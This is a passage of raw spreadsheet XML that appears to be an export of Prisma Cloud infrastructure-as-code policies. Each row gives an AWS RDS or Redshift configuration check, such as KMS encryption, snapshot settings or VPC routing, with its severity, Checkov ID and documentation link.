        </is>
      </c>
      <c r="AD821" t="b">
        <v>1</v>
      </c>
      <c r="AE821" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF821" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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1" t="inlineStr">
        <is>
          <t>98037c30-939b-474b-aa61-b1f8ef9bc6a2</t>
        </is>
      </c>
      <c r="AI821" t="inlineStr"/>
      <c r="AJ821" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK821" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="822">
      <c r="A822" t="inlineStr"/>
      <c r="B822" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C822" s="2" t="inlineStr"/>
      <c r="D822" t="inlineStr"/>
      <c r="E822" t="inlineStr"/>
      <c r="F822" t="inlineStr"/>
      <c r="G822" t="b">
        <v>1</v>
      </c>
      <c r="H8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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J822" t="inlineStr">
        <is>
          <t>IaC:General:aws-rds</t>
        </is>
      </c>
      <c r="K822" t="inlineStr">
        <is>
          <t>RDS cluster is not configured to copy tags to snapshots</t>
        </is>
      </c>
      <c r="L822" t="inlineStr"/>
      <c r="M822" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N822" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O822" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P822" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q822" t="inlineStr"/>
      <c r="R822" t="inlineStr"/>
      <c r="S822" t="inlineStr"/>
      <c r="T822" t="b">
        <v>0</v>
      </c>
      <c r="U822" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V822" t="inlineStr">
        <is>
          <t>IaC:General:aws-rds-cluster</t>
        </is>
      </c>
      <c r="W822" t="inlineStr">
        <is>
          <t>Ensure RDS cluster configured to copy tags to snapshots</t>
        </is>
      </c>
      <c r="X822" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-313</t>
        </is>
      </c>
      <c r="Y822" t="inlineStr"/>
      <c r="Z822" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_rds_cluster"]}</t>
        </is>
      </c>
      <c r="AA822" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB822" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC822" t="inlineStr">
        <is>
          <t>CKV_AWS_313</t>
        </is>
      </c>
      <c r="AD822" t="b">
        <v>1</v>
      </c>
      <c r="AE822" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF822" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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2" t="inlineStr">
        <is>
          <t>2822a8b2-2d68-45cf-a81c-429a37c15807</t>
        </is>
      </c>
      <c r="AI822" t="inlineStr"/>
      <c r="AJ822" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK822" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="823">
      <c r="A823" t="inlineStr"/>
      <c r="B823" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C823" s="2" t="inlineStr"/>
      <c r="D823" t="inlineStr"/>
      <c r="E823" t="inlineStr"/>
      <c r="F823" t="inlineStr"/>
      <c r="G823" t="b">
        <v>1</v>
      </c>
      <c r="H8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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J823" t="inlineStr">
        <is>
          <t>IaC:General:aws-rds</t>
        </is>
      </c>
      <c r="K823" t="inlineStr">
        <is>
          <t>AWS RDS Cluster activity streams are not encrypted by Key Management Service (KMS) using Customer Managed Keys (CMKs)</t>
        </is>
      </c>
      <c r="L823" t="inlineStr"/>
      <c r="M823" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N823" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O823" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P823" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q823" t="inlineStr"/>
      <c r="R823" t="inlineStr"/>
      <c r="S823" t="inlineStr"/>
      <c r="T823" t="b">
        <v>0</v>
      </c>
      <c r="U823" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V823" t="inlineStr">
        <is>
          <t>IaC:General:aws-rds-cluster-activity-stream</t>
        </is>
      </c>
      <c r="W823" t="inlineStr">
        <is>
          <t>Ensure RDS Cluster activity streams are encrypted using KMS CMKs</t>
        </is>
      </c>
      <c r="X823" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-rds-cluster-activity-streams-are-encrypted-by-key-management-service-kms-using-customer-managed-keys-cmks</t>
        </is>
      </c>
      <c r="Y823" t="inlineStr"/>
      <c r="Z823" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_rds_cluster_activity_stream"]}</t>
        </is>
      </c>
      <c r="AA823" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB823" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC823" t="inlineStr">
        <is>
          <t>CKV_AWS_246</t>
        </is>
      </c>
      <c r="AD823" t="b">
        <v>1</v>
      </c>
      <c r="AE823" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF823" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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3" t="inlineStr">
        <is>
          <t>411d0425-c08a-4bd7-b226-0ed9f8663d3c</t>
        </is>
      </c>
      <c r="AI823" t="inlineStr"/>
      <c r="AJ823" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK823" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="824">
      <c r="A824" t="inlineStr"/>
      <c r="B824" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C824" s="2" t="inlineStr"/>
      <c r="D824" t="inlineStr"/>
      <c r="E824" t="inlineStr"/>
      <c r="F824" t="inlineStr"/>
      <c r="G824" t="b">
        <v>1</v>
      </c>
      <c r="H8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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J824" t="inlineStr">
        <is>
          <t>IaC:General:aws-rds</t>
        </is>
      </c>
      <c r="K824" t="inlineStr">
        <is>
          <t>RDS Performance Insights are not encrypted using KMS CMKs</t>
        </is>
      </c>
      <c r="L824" t="inlineStr"/>
      <c r="M824" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N824" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O824" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P824" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q824" t="inlineStr"/>
      <c r="R824" t="inlineStr"/>
      <c r="S824" t="inlineStr"/>
      <c r="T824" t="b">
        <v>0</v>
      </c>
      <c r="U824" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V824" t="inlineStr">
        <is>
          <t>IaC:General:aws-rds-cluster-instance,aws-db-instance</t>
        </is>
      </c>
      <c r="W824" t="inlineStr">
        <is>
          <t>Ensure RDS Performance Insights are encrypted using KMS CMKs</t>
        </is>
      </c>
      <c r="X824" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-354</t>
        </is>
      </c>
      <c r="Y824" t="inlineStr"/>
      <c r="Z824" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_rds_cluster_instance","aws_db_instance"]}</t>
        </is>
      </c>
      <c r="AA824" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB824" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC824" t="inlineStr">
        <is>
          <t>CKV_AWS_354</t>
        </is>
      </c>
      <c r="AD824" t="b">
        <v>1</v>
      </c>
      <c r="AE824" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF824" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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4" t="inlineStr">
        <is>
          <t>88823b2a-3bf2-4ecc-9a7a-0cd96f24abd4</t>
        </is>
      </c>
      <c r="AI824" t="inlineStr"/>
      <c r="AJ824" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK824" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="825">
      <c r="A825" t="inlineStr"/>
      <c r="B825" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C825" s="2" t="inlineStr"/>
      <c r="D825" t="inlineStr"/>
      <c r="E825" t="inlineStr"/>
      <c r="F825" t="inlineStr"/>
      <c r="G825" t="b">
        <v>1</v>
      </c>
      <c r="H8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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J825" t="inlineStr">
        <is>
          <t>IaC:General:aws-rds</t>
        </is>
      </c>
      <c r="K825" t="inlineStr">
        <is>
          <t>AWS DB instance does not get all minor upgrades automatically</t>
        </is>
      </c>
      <c r="L825" t="inlineStr"/>
      <c r="M825" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N825" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O825" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P825" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q825" t="inlineStr"/>
      <c r="R825" t="inlineStr"/>
      <c r="S825" t="inlineStr"/>
      <c r="T825" t="b">
        <v>0</v>
      </c>
      <c r="U825" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V825" t="inlineStr">
        <is>
          <t>IaC:General:aws-rds-cluster-instance,aws-db-instance</t>
        </is>
      </c>
      <c r="W825" t="inlineStr">
        <is>
          <t>Ensure DB instance gets all minor upgrades automatically</t>
        </is>
      </c>
      <c r="X825" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-db-instance-gets-all-minor-upgrades-automatically</t>
        </is>
      </c>
      <c r="Y825" t="inlineStr"/>
      <c r="Z825" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_rds_cluster_instance", "aws_db_instance"]}</t>
        </is>
      </c>
      <c r="AA825" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB825" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC825" t="inlineStr">
        <is>
          <t>CKV_AWS_226</t>
        </is>
      </c>
      <c r="AD825" t="b">
        <v>1</v>
      </c>
      <c r="AE825" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF825" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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5" t="inlineStr">
        <is>
          <t>04cafb5e-bf60-4549-bb93-235b9bb6f321</t>
        </is>
      </c>
      <c r="AI825" t="inlineStr"/>
      <c r="AJ825" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK825" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="826">
      <c r="A826" t="inlineStr"/>
      <c r="B826" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C826" s="2" t="inlineStr"/>
      <c r="D826" t="inlineStr"/>
      <c r="E826" t="inlineStr"/>
      <c r="F826" t="inlineStr"/>
      <c r="G826" t="b">
        <v>1</v>
      </c>
      <c r="H8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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J826" t="inlineStr">
        <is>
          <t>IaC:General:aws-rds</t>
        </is>
      </c>
      <c r="K826" t="inlineStr">
        <is>
          <t>Unencrypted RDS global clusters</t>
        </is>
      </c>
      <c r="L826" t="inlineStr"/>
      <c r="M826" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N826" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O826" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P826" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q826" t="inlineStr"/>
      <c r="R826" t="inlineStr"/>
      <c r="S826" t="inlineStr"/>
      <c r="T826" t="b">
        <v>0</v>
      </c>
      <c r="U826" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V826" t="inlineStr">
        <is>
          <t>IaC:General:aws-rds-global-cluster</t>
        </is>
      </c>
      <c r="W826" t="inlineStr">
        <is>
          <t>Ensure that RDS global clusters are encrypted</t>
        </is>
      </c>
      <c r="X826" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-rds-global-clusters-are-encrypted</t>
        </is>
      </c>
      <c r="Y826" t="inlineStr"/>
      <c r="Z826" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_rds_global_cluster"]}</t>
        </is>
      </c>
      <c r="AA826" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB826" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC826" t="inlineStr">
        <is>
          <t>CKV_AWS_140</t>
        </is>
      </c>
      <c r="AD826" t="b">
        <v>1</v>
      </c>
      <c r="AE826" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF826" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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6" t="inlineStr">
        <is>
          <t>199f54d8-6099-4f68-ad1b-895587bbc991</t>
        </is>
      </c>
      <c r="AI826" t="inlineStr"/>
      <c r="AJ826" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK826" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="827">
      <c r="A827" t="inlineStr"/>
      <c r="B827" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C827" s="2" t="inlineStr"/>
      <c r="D827" t="inlineStr"/>
      <c r="E827" t="inlineStr"/>
      <c r="F827" t="inlineStr"/>
      <c r="G827" t="b">
        <v>1</v>
      </c>
      <c r="H8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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J827" t="inlineStr">
        <is>
          <t>IaC:General:aws-redshift</t>
        </is>
      </c>
      <c r="K827" t="inlineStr">
        <is>
          <t>Redshift clusters are not using the default database name.</t>
        </is>
      </c>
      <c r="L827" t="inlineStr"/>
      <c r="M827" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N827" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O827" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P827" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q827" t="inlineStr"/>
      <c r="R827" t="inlineStr"/>
      <c r="S827" t="inlineStr"/>
      <c r="T827" t="b">
        <v>0</v>
      </c>
      <c r="U827" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V827" t="inlineStr">
        <is>
          <t>IaC:General:aws-redshift-cluster</t>
        </is>
      </c>
      <c r="W827" t="inlineStr">
        <is>
          <t>Ensure Redshift clusters do not use the default database name</t>
        </is>
      </c>
      <c r="X827" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-320</t>
        </is>
      </c>
      <c r="Y827" t="inlineStr"/>
      <c r="Z827" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_redshift_cluster"]}</t>
        </is>
      </c>
      <c r="AA827" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB827" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC827" t="inlineStr">
        <is>
          <t>CKV_AWS_320</t>
        </is>
      </c>
      <c r="AD827" t="b">
        <v>1</v>
      </c>
      <c r="AE827" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF827" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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7" t="inlineStr">
        <is>
          <t>02149f11-1502-4acc-a4f8-4470861f4ef3</t>
        </is>
      </c>
      <c r="AI827" t="inlineStr"/>
      <c r="AJ827" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK827" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="828">
      <c r="A828" t="inlineStr"/>
      <c r="B828" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C828" s="2" t="inlineStr"/>
      <c r="D828" t="inlineStr"/>
      <c r="E828" t="inlineStr"/>
      <c r="F828" t="inlineStr"/>
      <c r="G828" t="b">
        <v>1</v>
      </c>
      <c r="H8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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J828" t="inlineStr">
        <is>
          <t>IaC:General:aws-redshift</t>
        </is>
      </c>
      <c r="K828" t="inlineStr">
        <is>
          <t>Amazon Redshift clusters do not have automatic snapshots enabled</t>
        </is>
      </c>
      <c r="L828" t="inlineStr"/>
      <c r="M828" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N828" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O828" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P828" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q828" t="inlineStr"/>
      <c r="R828" t="inlineStr"/>
      <c r="S828" t="inlineStr"/>
      <c r="T828" t="b">
        <v>0</v>
      </c>
      <c r="U828" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V828" t="inlineStr">
        <is>
          <t>IaC:General:aws-redshift-cluster</t>
        </is>
      </c>
      <c r="W828" t="inlineStr">
        <is>
          <t>Ensure Amazon Redshift clusters should have automatic snapshots enabled</t>
        </is>
      </c>
      <c r="X828" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-343</t>
        </is>
      </c>
      <c r="Y828" t="inlineStr"/>
      <c r="Z828" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_redshift_cluster"]}</t>
        </is>
      </c>
      <c r="AA828" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB828" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC828" t="inlineStr">
        <is>
          <t>CKV_AWS_343</t>
        </is>
      </c>
      <c r="AD828" t="b">
        <v>1</v>
      </c>
      <c r="AE828" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF828" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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8" t="inlineStr">
        <is>
          <t>66295923-266b-4da9-8eb0-cdfa3c4cd81d</t>
        </is>
      </c>
      <c r="AI828" t="inlineStr"/>
      <c r="AJ828" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK828" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="829">
      <c r="A829" t="inlineStr"/>
      <c r="B829" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C829" s="2" t="inlineStr"/>
      <c r="D829" t="inlineStr"/>
      <c r="E829" t="inlineStr"/>
      <c r="F829" t="inlineStr"/>
      <c r="G829" t="b">
        <v>1</v>
      </c>
      <c r="H8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29" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J829" t="inlineStr">
        <is>
          <t>IaC:General:aws-redshift</t>
        </is>
      </c>
      <c r="K829" t="inlineStr">
        <is>
          <t>Redshift clusters are not using enhanced VPC routing</t>
        </is>
      </c>
      <c r="L829" t="inlineStr"/>
      <c r="M829" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N829" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O829" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P829" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q829" t="inlineStr"/>
      <c r="R829" t="inlineStr"/>
      <c r="S829" t="inlineStr"/>
      <c r="T829" t="b">
        <v>0</v>
      </c>
      <c r="U829" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V829" t="inlineStr">
        <is>
          <t>IaC:General:aws-redshift-cluster</t>
        </is>
      </c>
      <c r="W829" t="inlineStr">
        <is>
          <t>Ensure Redshift clusters use enhanced VPC routing</t>
        </is>
      </c>
      <c r="X829" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-321</t>
        </is>
      </c>
      <c r="Y829" t="inlineStr"/>
      <c r="Z829" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_redshift_cluster"]}</t>
        </is>
      </c>
      <c r="AA829" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB829" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC829" t="inlineStr">
        <is>
          <t>CKV_AWS_321</t>
        </is>
      </c>
      <c r="AD829" t="b">
        <v>1</v>
      </c>
      <c r="AE829" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF829" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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29" t="inlineStr">
        <is>
          <t>72e9930e-6ae8-412b-a239-152b6e4b8fb7</t>
        </is>
      </c>
      <c r="AI829" t="inlineStr"/>
      <c r="AJ829" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK829" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="830">
      <c r="A830" t="inlineStr"/>
      <c r="B830" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C830" s="2" t="inlineStr"/>
      <c r="D830" t="inlineStr"/>
      <c r="E830" t="inlineStr"/>
      <c r="F830" t="inlineStr"/>
      <c r="G830" t="b">
        <v>1</v>
      </c>
      <c r="H8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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J830" t="inlineStr">
        <is>
          <t>IaC:General:aws-redshift</t>
        </is>
      </c>
      <c r="K830" t="inlineStr">
        <is>
          <t>Redshift clusters version upgrade is not default</t>
        </is>
      </c>
      <c r="L830" t="inlineStr"/>
      <c r="M830" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N830" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O830" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P830" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q830" t="inlineStr"/>
      <c r="R830" t="inlineStr"/>
      <c r="S830" t="inlineStr"/>
      <c r="T830" t="b">
        <v>0</v>
      </c>
      <c r="U830" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V830" t="inlineStr">
        <is>
          <t>IaC:General:aws-redshift-cluster</t>
        </is>
      </c>
      <c r="W830" t="inlineStr">
        <is>
          <t>Ensured that redshift cluster allowing version upgrade by default</t>
        </is>
      </c>
      <c r="X830" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-redshift-clusters-allow-version-upgrade-by-default</t>
        </is>
      </c>
      <c r="Y830" t="inlineStr"/>
      <c r="Z830" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_redshift_cluster"]}</t>
        </is>
      </c>
      <c r="AA830" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB830" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC830" t="inlineStr">
        <is>
          <t>CKV_AWS_141</t>
        </is>
      </c>
      <c r="AD830" t="b">
        <v>1</v>
      </c>
      <c r="AE830" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF830" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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0" t="inlineStr">
        <is>
          <t>9b884a63-1d3b-4756-9609-c346f1723086</t>
        </is>
      </c>
      <c r="AI830" t="inlineStr"/>
      <c r="AJ830" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK830" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="831">
      <c r="A831" t="inlineStr"/>
      <c r="B831" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C831" s="2" t="inlineStr"/>
      <c r="D831" t="inlineStr"/>
      <c r="E831" t="inlineStr"/>
      <c r="F831" t="inlineStr"/>
      <c r="G831" t="b">
        <v>1</v>
      </c>
      <c r="H8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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J831" t="inlineStr">
        <is>
          <t>IaC:General:aws-redshift</t>
        </is>
      </c>
      <c r="K831" t="inlineStr">
        <is>
          <t>RedShift snapshot copy is not encrypted by KMS using a customer managed Key (CMK).</t>
        </is>
      </c>
      <c r="L831" t="inlineStr"/>
      <c r="M831" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N831" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O831" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P831" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q831" t="inlineStr"/>
      <c r="R831" t="inlineStr"/>
      <c r="S831" t="inlineStr"/>
      <c r="T831" t="b">
        <v>0</v>
      </c>
      <c r="U831" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V831" t="inlineStr">
        <is>
          <t>IaC:General:aws-redshift-snapshot-copy-grant</t>
        </is>
      </c>
      <c r="W831" t="inlineStr">
        <is>
          <t>Ensure RedShift snapshot copy is encrypted by KMS using a customer managed Key (CMK)</t>
        </is>
      </c>
      <c r="X831" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-281</t>
        </is>
      </c>
      <c r="Y831" t="inlineStr"/>
      <c r="Z831" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_redshift_snapshot_copy_grant"]}</t>
        </is>
      </c>
      <c r="AA831" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB831" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC831" t="inlineStr">
        <is>
          <t>CKV_AWS_281</t>
        </is>
      </c>
      <c r="AD831" t="b">
        <v>1</v>
      </c>
      <c r="AE831" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF831" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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1" t="inlineStr">
        <is>
          <t>299ed98f-120c-428f-a905-65bd129fdc35</t>
        </is>
      </c>
      <c r="AI831" t="inlineStr"/>
      <c r="AJ831" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK831" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="832">
      <c r="A832" t="inlineStr"/>
      <c r="B832" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C832" s="2" t="inlineStr"/>
      <c r="D832" t="inlineStr"/>
      <c r="E832" t="inlineStr"/>
      <c r="F832" t="inlineStr"/>
      <c r="G832" t="b">
        <v>1</v>
      </c>
